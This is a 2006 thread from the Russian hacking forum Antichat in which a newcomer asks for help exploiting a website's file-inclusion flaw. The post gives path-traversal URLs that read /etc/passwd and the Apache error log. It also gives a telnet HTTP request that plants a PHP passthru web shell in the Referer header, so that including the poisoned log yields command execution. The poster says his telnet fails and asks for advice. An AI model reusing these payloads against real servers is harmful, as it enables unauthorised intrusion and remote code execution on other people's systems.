ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Помогите разобраться и инклудом!
  #1  
Старый 11.11.2006, 17:37
Аватар для MyPoorBrain
MyPoorBrain
Новичок
Регистрация: 09.11.2006
Сообщений: 5
Провел на форуме:
9581

Репутация: 1
Thumbs down Помогите разобраться и инклудом!

Помогите разобраться и инклудом!
Я нашёл вот это:

http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../../../../../../etc/passwd

Пошарил...

http://ввв.сайд.орг/static.php?file=../../../../../../../../../../../../usr/local/apache/logs/error_log

Я собирался подконектиться к телнету...
# telnet 127.0.0.1 80
# Trying 127.0.0.1...
# Connected to localhost.
# Escape character is '^]'.
# GET HTTP/1.1
# Accept: */*
# Accept-Language: ru.
# Accept-Encoding: deflate.
# User-Agent: Lynx/2.8.5rel.1 libwww-FM/2.14
# Host: 127.0.0.1
# Connection: Close
# Referer: http://127.0.0.1/<?passthru($_GET['cmd']);?>
# сдесь мы передали наш кода в поле Referer - на тот случай если фильтруются передоваемые GET-oм параметры сценарием на сервере.

...что бы получить шелл на базе лога. Но у меня, представьте себе, telnet не пашет =). Чо посоветуете?
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ПомогитЕ !!! подалуста найти кряк гейлордфакерЪ Болталка 2 30.08.2007 14:48
ПоМоГиТе! ПЛЗ!!! farik.aka E-Mail 1 17.09.2006 13:00
Помогите разобраться с угоном Аськи seeattact ICQ 5 17.01.2006 03:14
Sql-инъекции в чате. Помогите разобраться. Sumdex Чаты 1 28.03.2005 15:18
помогите разобраться svans Чаты 2 23.12.2002 21:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ